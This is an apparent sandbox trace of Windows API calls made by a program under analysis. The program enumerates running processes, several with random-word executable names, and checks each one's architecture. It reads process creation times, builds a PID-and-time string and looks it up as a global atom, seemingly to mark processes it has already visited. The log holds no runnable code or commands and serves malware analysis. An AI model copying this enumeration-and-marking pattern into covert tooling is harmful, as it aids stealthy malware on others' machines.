	[0133.762] CloseHandle (hObject=0x2dc) returned 1
	[0133.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.762] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.762] CloseHandle (hObject=0x2dc) returned 1
	[0133.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.762] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.762] CloseHandle (hObject=0x2dc) returned 1
	[0133.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.763] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.763] CloseHandle (hObject=0x2dc) returned 1
	[0133.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.763] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.763] CloseHandle (hObject=0x2dc) returned 1
	[0133.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.764] CloseHandle (hObject=0x2dc) returned 1
	[0133.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.764] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.764] CloseHandle (hObject=0x2dc) returned 1
	[0133.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.765] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.765] CloseHandle (hObject=0x2dc) returned 1
	[0133.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.765] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.765] CloseHandle (hObject=0x2dc) returned 1
	[0133.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.766] CloseHandle (hObject=0x2dc) returned 1
	[0133.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.766] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.766] CloseHandle (hObject=0x2dc) returned 1
	[0133.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.767] CloseHandle (hObject=0x2dc) returned 1
	[0133.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.767] CloseHandle (hObject=0x2dc) returned 1
	[0133.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.767] CloseHandle (hObject=0x2dc) returned 1
	[0133.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.768] CloseHandle (hObject=0x2dc) returned 1
	[0133.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.768] CloseHandle (hObject=0x2dc) returned 1
	[0133.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.769] CloseHandle (hObject=0x2dc) returned 1
	[0133.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.769] CloseHandle (hObject=0x2dc) returned 1
	[0133.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.770] CloseHandle (hObject=0x2dc) returned 1
	[0133.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.770] CloseHandle (hObject=0x2dc) returned 1
	[0133.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.770] CloseHandle (hObject=0x2dc) returned 1
	[0133.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.771] CloseHandle (hObject=0x2dc) returned 1
	[0133.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.771] CloseHandle (hObject=0x2dc) returned 1
	[0133.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.772] CloseHandle (hObject=0x2dc) returned 1
	[0133.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.772] CloseHandle (hObject=0x2dc) returned 1
	[0133.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.772] GetLastError () returned 0x5
	[0133.772] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.773] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.774] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.774] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.774] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.775] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.776] GetLastError () returned 0x5
	[0133.777] GetLastError () returned 0x5
	[0133.777] GetLastError () returned 0x5
	[0133.777] GetLastError () returned 0x5
	[0133.777] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.777] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.777] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.777] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.777] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.777] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.778] CloseHandle (hObject=0x2dc) returned 1
	[0133.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.778] CloseHandle (hObject=0x2dc) returned 1
	[0133.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.779] CloseHandle (hObject=0x2dc) returned 1
	[0133.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.779] CloseHandle (hObject=0x2dc) returned 1
	[0133.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.780] CloseHandle (hObject=0x2dc) returned 1
	[0133.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.780] CloseHandle (hObject=0x2dc) returned 1
	[0133.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.816] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.816] CloseHandle (hObject=0x2dc) returned 1
